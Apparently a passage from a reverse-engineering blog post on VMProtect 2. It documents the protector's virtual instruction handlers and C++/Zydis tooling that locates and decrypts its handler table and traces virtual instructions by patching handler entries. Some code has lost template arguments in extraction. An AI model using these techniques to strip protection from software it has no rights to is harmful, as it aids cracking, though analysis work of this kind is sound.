The SHLD virtual instruction shifts a value to the left using the native instruction SHLD. The result is then put onto the stack as well as RFLAGS. There is a variant of this instruction for one, two, four, and eight byte shifts.

SHLDQ — Shift Left Double Precision QWORD
SHLDQ shifts a QWORD to the left with double precision. The result is then put onto the virtual stack and RFLAGS is pushed onto the virtual stack.

mov rax, [rbp]
mov rdx, [rbp+0x08]
mov cl, [rbp+0x10]
add rbp, 0x02
shld rax, rdx, cl
mov [rbp+0x08], rax
pushfq
pop [rbp]
SHLDDW — Shift Left Double Precision DWORD
The SHLDDW virtual instruction shifts a DWORD value to the left with double precision. The result is pushed onto the virtual stack as well as RFLAGS.

mov eax, [rbp]
mov edx, [rbp+0x04]
mov cl, [rbp+0x08]
sub rbp, 0x02
shld eax, edx, cl
mov [rbp+0x08], eax
pushfq
pop [rbp]
SHR — Shift Right
The SHR instruction is the complement to SHL, this virtual instruction alters RFLAGS and thus the RFLAGS value will be on the top of the stack after executing this virtual instruction.

SHRQ — Shift Right QWORD
SHRQ shifts a QWORD value to the right. The result is put onto the virtual stack as well as RFLAGS.

mov rax, [rbp]
mov cl, [rbp+0x08]
sub rbp, 0x06
shr rax, cl
mov [rbp+0x08], rax
pushfq
pop [rbp]
SHRD — Double Precision Shift Right
The SHRD virtual instruction shifts a value to the right with double precision. There is a variant of this instruction for one, two, four, and eight byte shifts. The virtual instruction concludes with RFLAGS being pushed onto the virtual stack.

SHRDQ — Double Precision Shift Right QWORD
SHRDQ shifts a QWORD value to the right with double precision. The result is put onto the virtual stack. RFLAGS is then pushed onto the virtual stack.

mov rax, [rbp]
mov rdx, [rbp+0x08]
mov cl, [rbp+0x10]
add rbp, 0x02
shrd rax, rdx, cl
mov [rbp+0x08], rax
pushfq
pop [rbp]
SHRDDW — Double Precision Shift Right DWORD
SHRDDW shifts a DWORD value to the right with double precision. The result is put onto the virtual stack. RFLAGS is then pushed onto the virtual stack.

mov eax, [rbp]
mov edx, [rbp+0x04]
mov cl, [rbp+0x08]
sub rbp, 0x02
shrd eax, edx, cl
mov [rbp+0x08], eax
pushfq
pop [rbp]
NAND — Not Then And
The NAND instruction consists of a not being applied to the values on top of the stack, followed by the result of this not being bit wise and’ed to the next value on the stack. The and instruction alters RFLAGS thus, RFLAGS will be pushed onto the virtual stack.

NANDW — Not Then And WORD’s
NANDW NOT’s two WORD values then bitwise AND’s them together. RFLAGs is then pushed onto the virtual stack.

not dword ptr [rbp]
mov ax, [rbp]
sub rbp, 0x06
and [rbp+0x08], ax
pushfq
pop [rbp]
READCR3 — Read Control Register Three
The READCR3 virtual instruction is a wrapper vm handler around the native mov reg, cr3. This instruction will put the value of CR3 onto the virtual stack.

mov rax, cr3
sub rbp, 0x08
mov [rbp], rax
WRITECR3 — Write Control Register Three
The WRITECR3 virtual instruction is a wrapper vm handler around the native mov cr3, reg. This instruction will put a value into CR3.

mov rax, [rbp]
add rbp, 0x08
mov cr3, rax
PUSHVSP — Push Virtual Stack Pointer
PUSHVSP virtual instruction pushes the value contained in native register RBP onto the virtual stack stack. There is a variant of this instruction for one, two, four, and eight bytes.

PUSHVSPQ — Push Virtual Stack Pointer QWORD
PUSHVSPQ pushes the entire value of the virtual stack pointer onto the virtual stack.

mov rax, rbp
sub rbp, 0x08
mov [rbp], rax
PUSHVSPDW — Push Virtual Stack Pointer DWORD
PUSHVSPDW pushes the bottom four bytes of the virtual stack pointer onto the virtual stack.

mov eax, ebp
sub rbp, 0x04
mov [rbp], eax
PUSVSPW — Push Virtual Stack Pointer WORD
PUSVSPW pushes the bottom WORD value of the virtual stack pointer onto the virtual stack.

mov eax, ebp
sub rbp, 0x02
mov [rbp], ax
LVSP — Load Virtual Stack Pointer
This virtual instruction loads the virtual stack pointer register with the value at the top of the stack.

mov rbp, [rbp]
LVSPW — Load Virtual Stack Pointer Word
This virtual instruction loads the virtual stack pointer register with the WORD value at the top of the stack.

mov bp, [rbp]
LVSPDW — Load Virtual Stack Pointer DWORD
This virtual instruction loads the virtual stack pointer register with the DWORD value at the top of the stack.

mov ebp, [rbp]
LRFLAGS — Load RFLAGS
This virtual instruction loads the native flags register with the QWORD value at the top of the stack.

push [rbp]
add rbp, 0x08
popfq
JMP — Virtual Jump Instruction
The virtual JMP instruction changes the RSI register to point to a new set of virtual instructions. The value at the top of the stack is the lower 32bits of the RVA from the module base to the virtual instructions. This value is then added to the top 32bits of the image base value found in the optional header of the PE file. The base address is then added to this value.

mov esi, [rbp]
add rbp, 0x08
lea r12, [0x0000000000048F29]
mov rax, 0x00 ; image base bytes above 32bits…
add rsi, rax
mov rbx, rsi ; update decrypt key
add rsi, [rbp] ; add module base address
CALL — Virtual Call Instruction
The virtual call instruction takes an address of the top of the virtual stack and then calls it. RDX is used to hold the address so you can only really call functions with a single parameter using this.

mov rdx, [rbp]
add rbp, 0x08
call rdx
Significant Virtual Machine Signatures — Static Analysis
Now that VMProtect 2’s virtual machine architecture has been documented, we can reflect on the significant signatures. In addition, the obfuscation that VMProtect 2 generates can also be handled with quite simple techniques. This can make parsing the vm_entry routine trivial. vm_entry has no legit JCC’s so everytime we encounter a JCC we can simply follow it, remove the JCC from the instruction stream, then stop once we hit a JMP RCX/RDX. We can remove most deadstore by following how an instruction is used with Zydis, specifically tracking read and write dependencies on the destination register of an instruction. Finally with the cleaned up vm_entry we can now iterate through all of the instructions and find vm handlers, transformations required to decrypt vm handler table entries, and lastly the transformations required to decrypt the relative virtual address to the virtual instructions pushed onto the stack prior to jumping to vm_entry.

Locating VM Handler Table
One of the best, and most well known signatures is LEA r12, vm_handlers. This instruction is located inside of the vm_entry snippet of code and loads the linear virtual address of the vm handler table into R12. Using Zydis we can easily locate and parse this LEA to locate the vm handler table ourselves.

std::uintptr_t* vm::handler::table::get(const zydis_routine_t& vm_entry)
{
const auto result = std::find_if(
vm_entry.begin(), vm_entry.end(),
[](const zydis_instr_t& instr_data) -> bool
{
const auto instr = &instr_data.instr;
// lea r12, vm_handlers… (always r12)…
if (instr->mnemonic == ZYDIS_MNEMONIC_LEA &&
instr->operands[0].type == ZYDIS_OPERAND_TYPE_REGISTER &&
instr->operands[0].reg.value == ZYDIS_REGISTER_R12 &&
!instr->raw.sib.base) // no register used for the sib base…
return true;

        return false;
    }
);

if (result == vm_entry.end())
    return nullptr;

std::uintptr_t ptr = 0u;
ZydisCalcAbsoluteAddress(&result->instr,
    &result->instr.operands[1], result->addr, &ptr);

return reinterpret_cast<std::uintptr_t*>(ptr);

}
The above Zydis routine will locate the address of the VM handler table statically. It only requires a vector of ZydisDecodedInstructions, one for each instruction in the vm_entry routine. My implementation of this (vmprofiler) will deobfuscate vm_entry first then pass around this vector.

Locating VM Handler Table Entry Decryption
You can easily, programmatically determine what transformation is applied to VM handler table entries by first locating the instruction which fetches entries from said table. This instruction is documented in the vm_entry section, it consists of a SIB instruction with RDX or RCX as the destination, R12 as the base, RAX as the index, and eight as the scale.

.vmp0:0000000140005A41 49 8B 14 C4 mov rdx, [r12+rax*8]
This is easily located using Zydis. All that must be done is locate a SIB mov instruction with RCX, or RDX as the destination, R12 as the base, RAX as the index, and lastly eight as the index. Now, using Zydis we can find the next instruction with RDX or RCX as the destination, this instruction will be the transformation applied to VM handler table entries.

bool vm::handler::table::get_transform(
const zydis_routine_t& vm_entry, ZydisDecodedInstruction* transform_instr)
{
ZydisRegister rcx_or_rdx = ZYDIS_REGISTER_NONE;

auto handler_fetch = std::find_if(
    vm_entry.begin(), vm_entry.end(),
    [&](const zydis_instr_t& instr_data) -> bool
    {
        const auto instr = &instr_data.instr;
        if (instr->mnemonic == ZYDIS_MNEMONIC_MOV &&
            instr->operand_count == 2 &&
            instr->operands[1].type == ZYDIS_OPERAND_TYPE_MEMORY &&
            instr->operands[1].mem.base == ZYDIS_REGISTER_R12 &&
            instr->operands[1].mem.index == ZYDIS_REGISTER_RAX &&
            instr->operands[1].mem.scale == 8 &&
            instr->operands[0].type == ZYDIS_OPERAND_TYPE_REGISTER &&
            (instr->operands[0].reg.value == ZYDIS_REGISTER_RDX ||
                instr->operands[0].reg.value == ZYDIS_REGISTER_RCX))
        {
            rcx_or_rdx = instr->operands[0].reg.value;
            return true;
        }

        return false;
    }
);

// check to see if we found the fetch instruction and if the next instruction
// is not the end of the vector...
if (handler_fetch == vm_entry.end() || ++handler_fetch == vm_entry.end() ||
    // must be RCX or RDX... else something went wrong...
    (rcx_or_rdx != ZYDIS_REGISTER_RCX && rcx_or_rdx != ZYDIS_REGISTER_RDX))
    return false;

// find the next instruction that writes to RCX or RDX...
// the register is determined by the vm handler fetch above...
auto handler_transform = std::find_if(
    handler_fetch, vm_entry.end(),
    [&](const zydis_instr_t& instr_data) -> bool
    {
        if (instr_data.instr.operands[0].reg.value == rcx_or_rdx &&
            instr_data.instr.operands[0].actions & ZYDIS_OPERAND_ACTION_WRITE)
            return true;
        return false;
    }
);

if (handler_transform == vm_entry.end())
    return false;

*transform_instr = handler_transform->instr;
return true;

}
This function will parse the vm_entry routine and return the transformation done to decrypt VM handler table entries. In C++ each transformation operation can be implemented in lambdas and a single function can be coded to return the corresponding lambda routine for the transformation that must be applied.

.vmp0:0000000140005A41 49 8B 14 C4 mov rdx, [r12+rax*8]
.vmp0:0000000140005A49 48 81 F2 49 21 3D 7F xor rdx, 7F3D2149h
The above code is equivalent to the below C++ code. This will decrypt vm handler entries. To encrypt new values an inverse operation must be done. However for XOR that is simply XOR.

vm::decrypt_handler _decrypt_handler =
[](std::uint8_t idx) -> std::uint64_t
{
return vm_handlers[idx] ^ 0x7F3D2149;
};

// this is not the best example as the inverse of XOR is XOR…
vm::encrypt_handler _encrypt_handler =
[](std::uint8_t idx) -> std::uint64_t
{
return vm_handlers[idx] ^ 0x7F3D2149;
};
Handling Transformations — Templated Lambdas and Maps
The above decrypt and encrypt handlers can be dynamically generated by creating a map of each transformation type and a C++ lambda reimplementation of this instruction. Furthermore a routine to handle dynamic values such as byte sizes can be created. This prevents a switch case from being created every single time a transformation is required.

namespace transform
{
// …
template
inline std::map> transforms =
{
{ ZYDIS_MNEMONIC_ADD, _add },
{ ZYDIS_MNEMONIC_XOR, _xor },
{ ZYDIS_MNEMONIC_BSWAP, _bswap },
// SUB, INC, DEC, OR, AND, ETC…
};

// max size of a and b is 64 bits, a and b is then converted to 
// the number of bits in bitsize, the transformation is applied,
// finally the result is converted back to 64bits...
inline auto apply(std::uint8_t bitsize, ZydisMnemonic op,
    std::uint64_t a, std::uint64_t b) -> std::uint64_t
{
    switch (bitsize)
    {
    case 8:
        return transforms<std::uint8_t>[op](a, b);
    case 16:
        return transforms<std::uint16_t>[op](a, b);
    case 32:
        return transforms<std::uint32_t>[op](a, b);
    case 64:
        return transforms<std::uint64_t>[op](a, b);
    default:
        throw std::invalid_argument("invalid bit size...");
    }
}
// ...

}
This small snippet of code will allow for easy implementation of transformations in C++ with overflows in mind. It’s very important that sizes are respected during transformation as without correct size overflows as well as rolls and shifts will be incorrect. The below code is an example of how to decrypt operands of a virtual instruction by implementing the transformation in C++ dynamically.

// here for your eyes — better understanding of the code :^)
using map_t = std::map;

auto decrypt_operand(transform::map_t& transforms,
std::uint64_t operand, std::uint64_t rolling_key) -> std::pair
{
const auto key_decrypt = &transforms[transform::type::rolling_key];
const auto generic_decrypt_1 = &transforms[transform::type::generic1];
const auto generic_decrypt_2 = &transforms[transform::type::generic2];
const auto generic_decrypt_3 = &transforms[transform::type::generic3];
const auto update_key = &transforms[transform::type::update_key];

// apply transformation with rolling decrypt key...
operand = transform::apply(key_decrypt->operands[0].size,
    key_decrypt->mnemonic, operand, rolling_key);

// apply three generic transformations...
{
    operand = transform::apply(
        generic_decrypt_1->operands[0].size,
        generic_decrypt_1->mnemonic, operand, 
        // check to see if this instruction has an IMM...
        transform::has_imm(generic_decrypt_1) ? 
            generic_decrypt_1->operands[1].imm.value.u : 0);

    operand = transform::apply(
        generic_decrypt_2->operands[0].size,
        generic_decrypt_2->mnemonic, operand,
        // check to see if this instruction has an IMM...
        transform::has_imm(generic_decrypt_2) ?
            generic_decrypt_2->operands[1].imm.value.u : 0);

    operand = transform::apply(
        generic_decrypt_3->operands[0].size,
        generic_decrypt_3->mnemonic, operand,
        // check to see if this instruction has an IMM...
        transform::has_imm(generic_decrypt_3) ?
            generic_decrypt_3->operands[1].imm.value.u : 0);
}

// update rolling key...
rolling_key = transform::apply(key_decrypt->operands[0].size,
    key_decrypt->mnemonic, rolling_key, operand);

return { operand, rolling_key };

}
Extracting Transformations — Static Analysis Continued
The ability to reimplement transformations is important, however, being able to parse the transformations out of vm handlers and calc_jmp is another problem to be solved by itself. In order to determine where transformations are we must first determine if there is a need for transformations. Transformations are only applied to operands of virtual instructions. The first operand of a virtual instruction is always transformed in the same place, this code is known as calc_jmp which I explained earlier. The second place which transforms will be found is inside of vm handlers which handle immediate values. In other words if a virtual instruction has an immediate value there will be a unique set of transformations for that operand. Immediate values are read out of VIP (RSI) so we can use this key detail to determine if there is an immediate value as well as the size of the immediate value. It’s important to note that the immediate value read out of VIP does not always equal the size allocated for the decrypted value on the stack for instructions such as LCONST. This is because of sign extended and zero extended virtual instructions. Let’s examine an example virtual instruction which has an immediate value. This virtual instruction is called LCONSTWSE which stands for “load constant value of size word but sign extended to a DWORD”. The deobfuscated vm handler for this virtual instruction looks like so:

.vmp0:0000000140004478 66 0F B7 06 movzx ax, word ptr [rsi]
.vmp0:0000000140004412 66 29 D8 sub ax, bx
.vmp0:0000000140004416 66 D1 C0 rol ax, 1
.vmp0:0000000140004605 66 F7 D8 neg ax
.vmp0:000000014000460A 66 35 AC 21 xor ax, 21ACh
.vmp0:000000014000460F 66 29 C3 sub bx, ax
.vmp0:0000000140004613 98 cwde
.vmp0:0000000140004618 48 83 ED 04 sub rbp, 4
.vmp0:0000000140006E4F 89 45 00 mov [rbp+0], eax
.vmp0:0000000140007E2D 48 8D 76 02 lea rsi, [rsi+2]
As you can see there are two bytes read out of VIP. It’s the first instruction. This is something we can look for in zydis. Any MOVZX, MOVSX, or MOV where RAX is the destination and RSI is the source shows that there is an immediate value and thus we know that five transformations are expected in the instruction stream. We can then search for an instruction where RAX is the destination and RBX is the source. This will be the first transformation. In the above example, the first subtraction instruction is what we are looking for.

.vmp0:0000000140004412 66 29 D8 sub ax, bx
Next we can look for three instructions which have a write dependency on RAX. These three instructions will be the generic transformations applied to the operand.

.vmp0:0000000140004416 66 D1 C0 rol ax, 1
.vmp0:0000000140004605 66 F7 D8 neg ax
.vmp0:000000014000460A 66 35 AC 21 xor ax, 21ACh
At this point the operand is completely decrypted. The only thing left is a single transformation done to the rolling decryption key (RBX). This last transformation updates the rolling decryption key.

.vmp0:000000014000460F 66 29 C3 sub bx, ax
All of these transformation instructions can now be re-implemented by C++ lambdas on the fly. Using std::find_if is very useful for these types of searching algorithms as you can take it one step at a time. First locate the key transformations, then find the next three instructions which write to RAX.

bool vm::handler::get_transforms(const zydis_routine_t& vm_handler, transform::map_t& transforms)
{
auto imm_fetch = std::find_if(
vm_handler.begin(), vm_handler.end(),
[](const zydis_instr_t& instr_data) -> bool
{
// mov/movsx/movzx rax/eax/ax/al, [rsi]
if (instr_data.instr.operand_count > 1 &&
(instr_data.instr.mnemonic == ZYDIS_MNEMONIC_MOV ||
instr_data.instr.mnemonic == ZYDIS_MNEMONIC_MOVSX ||
instr_data.instr.mnemonic == ZYDIS_MNEMONIC_MOVZX) &&
instr_data.instr.operands[0].type == ZYDIS_OPERAND_TYPE_REGISTER &&
util::reg::compare(instr_data.instr.operands[0].reg.value, ZYDIS_REGISTER_RAX) &&
instr_data.instr.operands[1].type == ZYDIS_OPERAND_TYPE_MEMORY &&
instr_data.instr.operands[1].mem.base == ZYDIS_REGISTER_RSI)
return true;
return false;
}
);

if (imm_fetch == vm_handler.end())
    return false;

// this finds the first transformation which looks like:
// transform rax, rbx <--- note these registers can be smaller so we to64 them...
auto key_transform = std::find_if(imm_fetch, vm_handler.end(),
    [](const zydis_instr_t& instr_data) -> bool
    {
        if (util::reg::compare(instr_data.instr.operands[0].reg.value, ZYDIS_REGISTER_RAX) &&
            util::reg::compare(instr_data.instr.operands[1].reg.value, ZYDIS_REGISTER_RBX))
            return true;
        return false;
    }
);

// last transformation is the same as the first except src and dest are swapped...
transforms[transform::type::rolling_key] = key_transform->instr;
auto instr_copy = key_transform->instr;
instr_copy.operands[0].reg.value = key_transform->instr.operands[1].reg.value;
instr_copy.operands[1].reg.value = key_transform->instr.operands[0].reg.value;
transforms[transform::type::update_key] = instr_copy;

if (key_transform == vm_handler.end())
    return false;

// three generic transformations...
auto generic_transform = key_transform;

for (auto idx = 0u; idx < 3; ++idx)
{
    generic_transform = std::find_if(++generic_transform, vm_handler.end(),
        [](const zydis_instr_t& instr_data) -> bool
        {
            if (util::reg::compare(instr_data.instr.operands[0].reg.value, ZYDIS_REGISTER_RAX))
                return true;

            return false;
        }
    );

    if (generic_transform == vm_handler.end())
        return false;

    transforms[(transform::type)(idx + 1)] = generic_transform->instr;
}

return true;

}
As you can see above, the first transformation is the same as the last transformation except the source and destination operands are swapped. VMProtect 2 takes some creative liberties when applying the last transformation and can sometimes push the rolling decryption key onto the stack, apply the transformation, then pop the result back into RBX. This small, but significant inconvenience can be handled by simply swapping the destination and source registers in the ZydisDecodedInstruction variable as demonstrated in the above code.

Static Analysis Dilemma — Static Analysis Conclusion
The dilemma with trying to statically analyze virtual instructions is that branching operations inside of the virtual machine are very difficult to handle. In order to calculate where a virtual JMP is jumping to, emulation is required. I will be pursuing this in the near future (unicorn).

vmtracer — Tracing Virtual Instructions
Virtual instruction tracing is trivially achievable by patching every single vm handler table entry to an encrypted value which when decrypted points to a trap handler. This will allow for inter-instruction inspection of registers as well as the possibility to alter the result of a vm handler. In order to make good usage of this feature it’s important to understand what registers contain what values. You can refer to the “Overview Section” of this post.

The first and foremost important piece of information to log when intercepting virtual instructions is the opcode value which is located in AL. Logging this will tell us all of the virtual instructions executed. The next value which must be logged is the rolling decryption key value which is located in BL. This will allow vmprofiler to decrypt operands statically.

Since we are able to, logging all scratch registers after every single virtual instruction is an important addition to the logged information as this will paint an even bigger picture of what values are being manipulated. Lastly, logging the top five QWORD values on the virtual stack is done to provide even more information as again, this virtual instruction set architecture is based off of a stack machine.

To conclude the dynamic analysis section of this post, I have created a small file format for this runtime data. The file format is called “vmp2” and contains all runtime log information. The structures for this file format are very simple, they are listed below.

namespace vmp2
{
enum class exec_type_t
{
forward,
backward
};

enum class version_t
{
    invalid,
    v1 = 0x101
};

struct file_header
{
    u32 magic; // VMP2
    u64 epoch_time;
    u64 module_base;
    exec_type_t advancement;
    version_t version;
    u32 entry_count;
    u32 entry_offset;
};

struct entry_t
{
    u8 handler_idx;
    u64 decrypt_key;
    u64 vip;

    union
    {
        struct
        {
            u64 r15;
            u64 r14;
            u64 r13;
            u64 r12;
            u64 r11;
            u64 r10;
            u64 r9;
            u64 r8;
            u64 rbp;
            u64 rdi;
            u64 rsi;
            u64 rdx;
            u64 rcx;
            u64 rbx;
            u64 rax;
            u64 rflags;
        };
        u64 raw[16];
    } regs;

    union
    {
        u64 qword[0x28];
        u8 raw[0x140];
    } vregs;

    union
    {
        u64 qword[0x20];
        u8 raw[0x100];
    } vsp;
};

}
vmprofile-cli — Static Analysis Using Runtime Traces
Provided a “vmp2” file, vmprofiler will produce pseudo virtual instructions including immediate values as well as affected scratch registers. This is not devirtualization by any means, nor does it provide a view of multiple code paths, however it does give a very useful trace of executed virtual instructions. Vmprofiler can also be used to statically locate the vm handler table and determine what transformation is used to decrypt these vm handler entries.

An example output of vmprofiler will produce all information about every vm handler including immediate value bit size, virtual instruction name, as well as the five transformations applied to the immediate value if there is an immediate value.

==========[vm handler LCONSTCBW, imm size = 8]=======
================[vm handler instructions]============

0x00007FF65BAE5C2E movzx eax, byte ptr [rsi]
0x00007FF65BAE5C82 add al, bl
0x00007FF65BAE5C85 add al, 0xD3
0x00007FF65BAE6FC7 not al
0x00007FF65BAE4D23 inc al
0x00007FF65BAE5633 add bl, al
0x00007FF65BAE53D5 sub rsi, 0xFFFFFFFFFFFFFFFF
0x00007FF65BAE5CD1 sub rbp, 0x02
0x00007FF65BAE62F8 mov [rbp], ax
=================[vm handler transforms]=============
add al, bl
add al, 0xD3
not al
inc al

add bl, al

The transformations, if any, are extracted as well from the vm handler and can be executed dynamically to decrypt operands.

SREGQ 0x0000000000000088 (VSP[0] = 0x00007FF549600000) (VSP[1] = 0x0000000000000000)
LCONSTDSX 0x000000007D361173 (VSP[0] = 0x0000000000000000) (VSP[1] = 0x0000000000000000)
ADDQ (VSP[0] = 0x000000007D361173) (VSP[1] = 0x0000000000000000)
SREGQ 0x0000000000000010 (VSP[0] = 0x0000000000000202) (VSP[1] = 0x000000007D361173)
SREGQ 0x0000000000000048 (VSP[0] = 0x000000007D361173) (VSP[1] = 0x0000000000000000)
SREGQ 0x0000000000000000 (VSP[0] = 0x0000000000000000) (VSP[1] = 0x0000000000000100)
SREGQ 0x0000000000000038 (VSP[0] = 0x0000000000000100) (VSP[1] = 0x00000000000000B8)
SREGQ 0x0000000000000028 (VSP[0] = 0x00000000000000B8) (VSP[1] = 0x0000000000000246)
SREGQ 0x00000000000000B8 (VSP[0] = 0x0000000000000246) (VSP[1] = 0x0000000000000100)
SREGQ 0x0000000000000010 (VSP[0] = 0x0000000000000100) (VSP[1] = 0x000000892D8FDA88)
SREGQ 0x00000000000000B0 (VSP[0] = 0x000000892D8FDA88) (VSP[1] = 0x0000000000000000)
SREGQ 0x0000000000000040 (VSP[0] = 0x0000000000000000) (VSP[1] = 0x0000000000000020)
SREGQ 0x0000000000000030 (VSP[0] = 0x0000000000000020) (VSP[1] = 0x0000000000000000)
SREGQ 0x0000000000000020 (VSP[0] = 0x0000000000000000) (VSP[1] = 0x2AAAAAAAAAAAAAAB)
// …
Displaying Trace Information — vmprofiler-qt
In order to display all traced information such as native register values, scratch register values and virtual stack values I have created a very small Qt project which will allow you to step through a trace. I felt that a console was way too restrictive and I also found it hard to prioritize what needs to be displayed on the console, thus the need for a GUI.

Virtual Machine Behavior
After the vm_entry routine executes, all registers that were pushed onto the stack are then loaded into virtual machine scratch registers. This also extends to the module base and RFLAGS which was also pushed onto the stack. The mapping of native registers to scratch registers is not respected.

Another behavior which the virtual machine architecture exhibits is that if a native instruction is not implemented with vm handlers a vmexit will happen to execute the native instruction. In my version of VMProtect 2 CPUID is not implemented with vm handlers so an exit happens.

Prior to a vmexit, values from scratch registers are loaded onto the virtual stack. The vmexit virtual instruction will put these values back into native registers. You can see that the scratch registers are different from the ones directly after a vmentry. This is because like I said before scratch registers are not mapped to native registers.

Demo — Creating and Inspecting A Virtual Trace
For this demo I will be virtualizing a very simple binary which just executes CPUID and returns true if AVX is supported, else it returns false. The assembly code for this is displayed below.

.text:00007FF776A01000 ; int __fastcall main()
.text:00007FF776A01000 public main
.text:00007FF776A01000 push rbx
.text:00007FF776A01002 sub rsp, 10h
.text:00007FF776A01006 xor ecx, ecx
.text:00007FF776A01008 mov eax, 1
.text:00007FF776A0100D cpuid
.text:00007FF776A0100F shr ecx, 1Ch
.text:00007FF776A01012 and ecx, 1
.text:00007FF776A01015 mov eax, ecx
.text:00007FF776A01017 add rsp, 10h
.text:00007FF776A0101B pop rbx
.text:00007FF776A0101C retn
.text:00007FF776A0101C main endp
When protecting this code I have opted out of using packing for simplicity of the demonstration. I have protected the binary with “Ultra» settings, which is just obfuscation + virtualization. Looking at the PE header of the output file, we can see that the entry point RVA is 0x1000, the image base is 0x140000000. We can now give this information to vmprofiler-cli and it should give us the vm handler table RVA as well as all of the vm handler information.

vmprofiler-cli.exe —vmpbin vmptest.vmp.exe —vmentry 0x1000 —imagebase 0x140000000

0x00007FF670F2822C push 0xFFFFFFFF890001FA
0x00007FF670F27FC9 push 0x45D3BF1F
0x00007FF670F248E4 push r13
0x00007FF670F24690 push rsi
0x00007FF670F24E53 push r14
0x00007FF670F274FB push rcx
0x00007FF670F2607C push rsp
0x00007FF670F24926 pushfq
0x00007FF670F24DC2 push rbp
0x00007FF670F25C8C push r12
0x00007FF670F252AC push r10
0x00007FF670F251A5 push r9
0x00007FF670F25189 push rdx
0x00007FF670F27D5F push r8
0x00007FF670F24505 push rdi
0x00007FF670F24745 push r11
0x00007FF670F2478B push rax
0x00007FF670F27A53 push rbx
0x00007FF670F2500D push r15
0x00007FF670F26030 push [0x00007FF670F27912]
0x00007FF670F2593A mov rax, 0x7FF530F20000
0x00007FF670F25955 mov r13, rax
0x00007FF670F25965 push rax
0x00007FF670F2596F mov esi, [rsp+0xA0]
0x00007FF670F25979 not esi
0x00007FF670F25985 neg esi
0x00007FF670F2598D ror esi, 0x1A
0x00007FF670F2599E mov rbp, rsp
0x00007FF670F259A8 sub rsp, 0x140
0x00007FF670F259B5 and rsp, 0xFFFFFFFFFFFFFFF0
0x00007FF670F259C1 mov rdi, rsp
0x00007FF670F259CB lea r12, [0x00007FF670F26473]
0x00007FF670F259DF mov rax, 0x100000000
0x00007FF670F259EC add rsi, rax
0x00007FF670F259F3 mov rbx, rsi
0x00007FF670F259FA add rsi, [rbp]
0x00007FF670F25A05 mov al, [rsi]
0x00007FF670F25A0A xor al, bl
0x00007FF670F25A11 neg al
0x00007FF670F25A19 rol al, 0x05
0x00007FF670F25A26 inc al
0x00007FF670F25A2F xor bl, al
0x00007FF670F25A34 movzx rax, al
0x00007FF670F25A41 mov rdx, [r12+rax8] 0x00007FF670F25A49 xor rdx, 0x7F3D2149 0x00007FF670F25507 inc rsi 0x00007FF670F27951 add rdx, r13 0x00007FF670F27954 jmp rdx located vm handler table… at = 0x00007FF670F26473, rva = 0x0000000140006473 We can see that vmprofiler-cli has flattened and deobfuscated the vm_entry code as well as located the vm handler table. We can also see the transformation done to decrypt vm handler entities, it’s the XOR directly after mov rdx, [r12+rax8].

0x00007FF670F25A41 mov rdx, [r12+rax*8]
0x00007FF670F25A49 xor rdx, 0x7F3D2149
We can also see that VIP advanced positively as RSI is incremented by the INC instruction.

0x00007FF670F25507 inc rsi
Armed with this information we can now compile a vmtracer program which will patch all vm handler table entries to our trap handler which will allow us to trace virtual instructions as well as alter virtual instruction results.

// lambdas to encrypt and decrypt vm handler entries
// you must extract this information from the flattened
// and deobfuscated view of vm_entry…

vm::decrypt_handler_t _decrypt_handler =
[](u64 val) -> u64
{

return val ^ 0x7F3D2149;

};

vm::encrypt_handler_t _encrypt_handler =
[](u64 val) -> u64
{
return val ^ 0x7F3D2149;
};

vm::handler::edit_entry_t _edit_entry =
[](u64* entry_ptr, u64 val) -> void
{
DWORD old_prot;
VirtualProtect(entry_ptr, sizeof val,
PAGE_EXECUTE_READWRITE, &old_prot);

*entry_ptr = val;
VirtualProtect(entry_ptr, sizeof val,
    old_prot, &old_prot);

};

// create vm trace file header…
vmp2::file_header trace_header;
memcpy(&trace_header.magic, «VMP2», sizeof «VMP2» — 1);
trace_header.epoch_time = time(nullptr);
trace_header.entry_offset = sizeof trace_header;
trace_header.advancement = vmp2::exec_type_t::forward;
trace_header.version = vmp2::version_t::v1;
trace_header.module_base = module_base;
I have omitted some of the other code such as the ofstream code and vmtracer class instantiation, you can find that code here. The main purpose of displaying this information is to show you how to parse a vm_entry and extract the information which is required to create a trace.

In my demo tracer I simply LoadLibraryExA the protected binary, initialize a vmtracer class, patch the vm handler table, then call the entry point of the module. This is far from ideal, however for demonstration purposes it will suffice.

// patch vm handler table…
tracer.start();

// call entry point…
auto result = reinterpret_cast(
NT_HEADER(module_base)->OptionalHeader.AddressOfEntryPoint + module_base)();

// unpatch vm handler table…
tracer.stop();
Now that a trace file has been created we can now inspect the trace via vmprofiler-cli or vmprofiler-qt. However I would suggest the latter as the program has been explicitly created to view trace files.

When loading a trace file into vmprofiler-qt, one must know the vm_entry RVA as well as the image base found in the optional header of the PE file. Given all of this information as well as the original protected binary, vmprofiler-qt will display all virtual instructions in a trace file and allow for you to “single step” through it.

Let’s look at the trace file and see if we can locate the original instructions which have now been converted to a RISC, stack machine based architecture. The first block of code that executes after vm_entry seems to contain no code pertaining to the original binary. It is here simply for obfuscation purposes and to prevent static analysis of virtual instructions as to understand where the virtual JMP instruction is going to land would require emulation of the virtual instruction set. This first jump block is located inside of every single protected binary.

The next block following the virtual JMP instruction does a handful of interesting math operations pertaining to the stack. If you look closely you can see that the math operation being executed is: sub(x, y) = ~((~(x) & ~(x)) + y) & ~((~(x) & ~(x)) + y); sub(VSP, 10).

If we simplify this math operation we can see that the operation is a subtraction done to VSP. sub(x, y) = ~((~x) + y). This is equivalent to the native operation sub rsp, 0x10. If we look at the original binary, the one that is not virtualized, we can see that there is in fact this instruction.

The mov eax, 1 displayed above can be seen in the virtual instructions closely after the subtraction done on VSP. The MOV EAX, 1 is done via a LCONSTBSX and a SREGDW. The SREG bitsize matches the native register width of 32bits, as well as the constant value being loaded into it.

Next we see that a vmexit happens. We can see where code execution will continue outside of the virtual machine by going to the last ADDQ prior to the vmexit. The first two values on the stack should be the module base address and 32bit relative virtual address to the routine that will be returned to. In this trace the RVA is 0x140008236. If we inspect this address in IDA we can see that the instruction “CPUID” is here.

.vmp0:0000000140008236 0F A2 cpuid
.vmp0:0000000140008238 0F 81 88 FE FF FF jno loc_1400080C6
.vmp0:000000014000823E 68 05 02 00 79 push 79000205h
.vmp0:0000000140008243 E9 77 FD FF FF jmp loc_140007FBF
As you can see, directly after the CPUID instruction, code execution enters back into the virtual machine. Directly after setting all virtual scratch registers with native register values located on the virtual stack a constant is loaded onto the stack with the value of 0x1C. The resulting value from CPUID is then shifted to the right by this constant value.

The AND operation is done with two NAND operations. The first NAND simply inverts the result from the SHR; invert(x) = ~(x) & ~(x). This is done by loading the DWORD value twice onto the stack to make a single QWORD.

